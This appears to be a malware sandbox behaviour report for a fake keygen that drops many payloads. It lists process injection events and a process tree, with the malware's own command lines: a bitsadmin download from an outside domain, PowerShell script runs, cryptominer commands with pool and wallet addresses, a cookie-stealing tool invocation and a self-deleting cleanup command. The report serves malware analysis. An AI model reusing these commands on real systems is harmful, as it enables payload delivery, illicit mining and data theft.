5352	google-game.exe

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
388	Process not Found
388	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 856	512	keygen-step-4 — копия.exe	74
PID 512 wrote to memory of 856	512	keygen-step-4 — копия.exe	74
PID 512 wrote to memory of 856	512	keygen-step-4 — копия.exe	74
PID 856 wrote to memory of 2412	856	xiuhuali.exe	78
PID 856 wrote to memory of 2412	856	xiuhuali.exe	78
PID 856 wrote to memory of 2412	856	xiuhuali.exe	78
PID 512 wrote to memory of 2528	512	keygen-step-4 — копия.exe	79
PID 512 wrote to memory of 2528	512	keygen-step-4 — копия.exe	79
PID 2412 wrote to memory of 3076	2412	rundll32.exe	71
PID 3076 wrote to memory of 3368	3076	svchost.exe	80
PID 3076 wrote to memory of 3368	3076	svchost.exe	80
PID 2412 wrote to memory of 2560	2412	rundll32.exe	26
PID 3076 wrote to memory of 3368	3076	svchost.exe	80
PID 2412 wrote to memory of 296	2412	rundll32.exe	12
PID 2412 wrote to memory of 2364	2412	rundll32.exe	38
PID 2412 wrote to memory of 2340	2412	rundll32.exe	39
PID 2412 wrote to memory of 1108	2412	rundll32.exe	18
PID 2412 wrote to memory of 908	2412	rundll32.exe	14
PID 2412 wrote to memory of 1448	2412	rundll32.exe	54
PID 2412 wrote to memory of 1916	2412	rundll32.exe	42
PID 2412 wrote to memory of 1304	2412	rundll32.exe	56
PID 2412 wrote to memory of 1228	2412	rundll32.exe	60
PID 2412 wrote to memory of 2676	2412	rundll32.exe	29
PID 2412 wrote to memory of 2688	2412	rundll32.exe	28
PID 512 wrote to memory of 2460	512	keygen-step-4 — копия.exe	81
PID 512 wrote to memory of 2460	512	keygen-step-4 — копия.exe	81
PID 512 wrote to memory of 2460	512	keygen-step-4 — копия.exe	81
PID 2460 wrote to memory of 3304	2460	Install.exe	82
PID 2460 wrote to memory of 3304	2460	Install.exe	82
PID 2460 wrote to memory of 3304	2460	Install.exe	82
PID 3304 wrote to memory of 3344	3304	Install.tmp	85
PID 3304 wrote to memory of 3344	3304	Install.tmp	85
PID 3344 wrote to memory of 4248	3344	Ultra.exe	87
PID 3344 wrote to memory of 4248	3344	Ultra.exe	87
PID 3344 wrote to memory of 4248	3344	Ultra.exe	87
PID 4248 wrote to memory of 4280	4248	ultramediaburner.exe	88
PID 4248 wrote to memory of 4280	4248	ultramediaburner.exe	88
PID 4248 wrote to memory of 4280	4248	ultramediaburner.exe	88
PID 4280 wrote to memory of 4344	4280	ultramediaburner.tmp	89
PID 4280 wrote to memory of 4344	4280	ultramediaburner.tmp	89
PID 3344 wrote to memory of 4424	3344	Ultra.exe	91
PID 3344 wrote to memory of 4424	3344	Ultra.exe	91
PID 3344 wrote to memory of 4480	3344	Ultra.exe	92
PID 3344 wrote to memory of 4480	3344	Ultra.exe	92
PID 512 wrote to memory of 4576	512	keygen-step-4 — копия.exe	93
PID 512 wrote to memory of 4576	512	keygen-step-4 — копия.exe	93
PID 512 wrote to memory of 4576	512	keygen-step-4 — копия.exe	93
PID 4480 wrote to memory of 1932	4480	Beferobume.exe	97
PID 4480 wrote to memory of 1932	4480	Beferobume.exe	97
PID 1932 wrote to memory of 4460	1932	cmd.exe	99
PID 1932 wrote to memory of 4460	1932	cmd.exe	99
PID 1932 wrote to memory of 4460	1932	cmd.exe	99
PID 4576 wrote to memory of 1772	4576	filee.exe	101
PID 4576 wrote to memory of 1772	4576	filee.exe	101
PID 4576 wrote to memory of 1772	4576	filee.exe	101
PID 4576 wrote to memory of 5172	4576	filee.exe	103
PID 4576 wrote to memory of 5172	4576	filee.exe	103
PID 4480 wrote to memory of 5184	4480	Beferobume.exe	117
PID 4480 wrote to memory of 5184	4480	Beferobume.exe	117
PID 5184 wrote to memory of 5352	5184	md1_1eaf.exe	106
PID 5184 wrote to memory of 5352	5184	md1_1eaf.exe	106
PID 5184 wrote to memory of 5352	5184	md1_1eaf.exe	106
PID 5352 wrote to memory of 5432	5352	google-game.exe	111
PID 5352 wrote to memory of 5432	5352	google-game.exe	111

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:296

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:908
- C:\Users\Admin\AppData\Roaming\gairbtd
  C:\Users\Admin\AppData\Roaming\gairbtd
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4904
- C:\Users\Admin\AppData\Roaming\jiirbtd
  C:\Users\Admin\AppData\Roaming\jiirbtd
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2336
- - C:\Users\Admin\AppData\Roaming\jiirbtd
    C:\Users\Admin\AppData\Roaming\jiirbtd
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: MapViewOfSection
    PID:2840
- C:\Users\Admin\AppData\Roaming\gairbtd
  C:\Users\Admin\AppData\Roaming\gairbtd
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:5660
- C:\Users\Admin\AppData\Roaming\jiirbtd
  C:\Users\Admin\AppData\Roaming\jiirbtd
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5860
- - C:\Users\Admin\AppData\Roaming\jiirbtd
    C:\Users\Admin\AppData\Roaming\jiirbtd
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:5508
- C:\Users\Admin\AppData\Roaming\gairbtd
  C:\Users\Admin\AppData\Roaming\gairbtd
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  PID:4656
- C:\Users\Admin\AppData\Roaming\jiirbtd
  C:\Users\Admin\AppData\Roaming\jiirbtd
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4940
- - C:\Users\Admin\AppData\Roaming\jiirbtd
    C:\Users\Admin\AppData\Roaming\jiirbtd
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:5580
- C:\Windows\system32\rundll32.exe
  C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll",DlRhNcvOzN
  2⤵
  - Windows security modification
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3492

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1108

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2688

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2364

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2340

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1916

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1228

C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:512
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2412
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2460
- - C:\Users\Admin\AppData\Local\Temp\is-CBJ5M.tmp\Install.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-CBJ5M.tmp\Install.tmp" /SL5="$401A4,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3304
  - - C:\Users\Admin\AppData\Local\Temp\is-7CRKG.tmp\Ultra.exe
      "C:\Users\Admin\AppData\Local\Temp\is-7CRKG.tmp\Ultra.exe" /S /UID=burnerch1
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3344
    - - C:\Program Files\Windows Security\TZKAEALERZ\ultramediaburner.exe
        
        "C:\Program Files\Windows Security\TZKAEALERZ\ultramediaburner.exe" /VERYSILENT
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4248
      - C:\Users\Admin\AppData\Local\Temp\is-6H8D5.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6H8D5.tmp\ultramediaburner.tmp" /SL5="$201F8,281924,62464,C:\Program Files\Windows Security\TZKAEALERZ\ultramediaburner.exe" /VERYSILENT
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:4280
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        7⤵
        Executes dropped EXE
        
        PID:4344
    - - C:\Users\Admin\AppData\Local\Temp\ff-41e4c-2ab-15a93-3191f2fb664e6\Jezhesixiji.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ff-41e4c-2ab-15a93-3191f2fb664e6\Jezhesixiji.exe"
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:4424
    - - C:\Users\Admin\AppData\Local\Temp\25-7bd65-8a6-60ba4-c2ed27eb9810c\Beferobume.exe
        
        "C:\Users\Admin\AppData\Local\Temp\25-7bd65-8a6-60ba4-c2ed27eb9810c\Beferobume.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4480
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xts5sfvd.1gh\instEU.exe & exit
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\xts5sfvd.1gh\instEU.exe
        
        C:\Users\Admin\AppData\Local\Temp\xts5sfvd.1gh\instEU.exe
        7⤵
        Executes dropped EXE
        
        PID:4460
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1vjpoegx.oin\google-game.exe & exit
        6⤵
        
        PID:5184
        
        C:\Users\Admin\AppData\Local\Temp\1vjpoegx.oin\google-game.exe
        
        C:\Users\Admin\AppData\Local\Temp\1vjpoegx.oin\google-game.exe
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:5352
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        8⤵
        Loads dropped DLL
        
        PID:5432
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jg4mbwsr.j1s\md1_1eaf.exe & exit
        6⤵
        
        PID:1508
        
        C:\Users\Admin\AppData\Local\Temp\jg4mbwsr.j1s\md1_1eaf.exe
        
        C:\Users\Admin\AppData\Local\Temp\jg4mbwsr.j1s\md1_1eaf.exe
        7⤵
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of WriteProcessMemory
        
        PID:5184
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gkne2okq.c5k\askinstall39.exe & exit
        6⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\gkne2okq.c5k\askinstall39.exe
        
        C:\Users\Admin\AppData\Local\Temp\gkne2okq.c5k\askinstall39.exe
        7⤵
        
        PID:4204
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:5844
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:5576
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g5xif3vg.fl1\inst.exe & exit
        6⤵
        
        PID:5488
        
        C:\Users\Admin\AppData\Local\Temp\g5xif3vg.fl1\inst.exe
        
        C:\Users\Admin\AppData\Local\Temp\g5xif3vg.fl1\inst.exe
        7⤵
        
        PID:2156
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rplm31c2.yvr\SunLabsPlayer.exe /S & exit
        6⤵
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\rplm31c2.yvr\SunLabsPlayer.exe
        
        C:\Users\Admin\AppData\Local\Temp\rplm31c2.yvr\SunLabsPlayer.exe /S
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        
        PID:2156
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:3988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:4800
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        Checks for any installed AV software in registry
        
        PID:6060
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
        8⤵
        Download via BitsAdmin
        
        PID:5312
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPPviIyAEhz2BJi1 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:5824
        
        C:\Program Files (x86)\lighteningplayer\data_load.exe
        
        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pP4sJ2Xts2O9yQyZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
        8⤵
        Executes dropped EXE
        
        PID:5516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        Executes dropped EXE
        
        PID:4016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5312
        
        C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
        8⤵
        Loads dropped DLL
        
        PID:5592
        
        C:\Windows\system32\rundll32.exe
        
        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\DlRhNcvOzN\DlRhNcvOzN.dll" DlRhNcvOzN
        9⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:4664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5716
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:4264
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:5940
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:5168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        
        PID:3692
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsnB2DD.tmp\tempfile.ps1"
        8⤵
        Blocklisted process makes network request
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:5488
        
        C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
        
        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6116
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n341tycf.tcc\GcleanerWW.exe /mixone & exit
        6⤵
        
        PID:4716
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ltel2cqi.4vh\toolspab1.exe & exit
        6⤵
        
        PID:6092
        
        C:\Users\Admin\AppData\Local\Temp\ltel2cqi.4vh\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ltel2cqi.4vh\toolspab1.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4244
        
        C:\Users\Admin\AppData\Local\Temp\ltel2cqi.4vh\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ltel2cqi.4vh\toolspab1.exe
        8⤵
        
        PID:4800
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f2yeklpg.03p\c7ae36fa.exe & exit
        6⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\f2yeklpg.03p\c7ae36fa.exe
        
        C:\Users\Admin\AppData\Local\Temp\f2yeklpg.03p\c7ae36fa.exe
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: MapViewOfSection
        
        PID:5372
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1rzpfsui.0iy\app.exe /8-2222 & exit
        6⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\1rzpfsui.0iy\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\1rzpfsui.0iy\app.exe /8-2222
        7⤵
        Executes dropped EXE
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\1rzpfsui.0iy\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1rzpfsui.0iy\app.exe" /8-2222
        8⤵
        
        PID:5488
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
  2⤵
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious use of WriteProcessMemory
  PID:4576
- - C:\Users\Admin\AppData\Roaming\5087.tmp.exe
    "C:\Users\Admin\AppData\Roaming\5087.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1772
  - - C:\Users\Admin\AppData\Roaming\5087.tmp.exe
      "C:\Users\Admin\AppData\Roaming\5087.tmp.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:5936
- - C:\Users\Admin\AppData\Roaming\5599.tmp.exe
    "C:\Users\Admin\AppData\Roaming\5599.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    PID:5172
  - - C:\Windows\system32\msiexec.exe
      -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w3192@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
      4⤵
      PID:4732
  - - C:\Windows\system32\msiexec.exe
      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9195 --cpu-max-threads-hint 50 -r 9999
      4⤵
      Blocklisted process makes network request
      PID:5200
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
    3⤵
    PID:5164
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1
      4⤵
      Runs ping.exe
      PID:5232
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:4588
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4204
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:5248
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:4016
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:3508
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:6076

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3076
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:3368

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4980

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5032

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2076

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4624

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5852

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:1596

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:5712

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
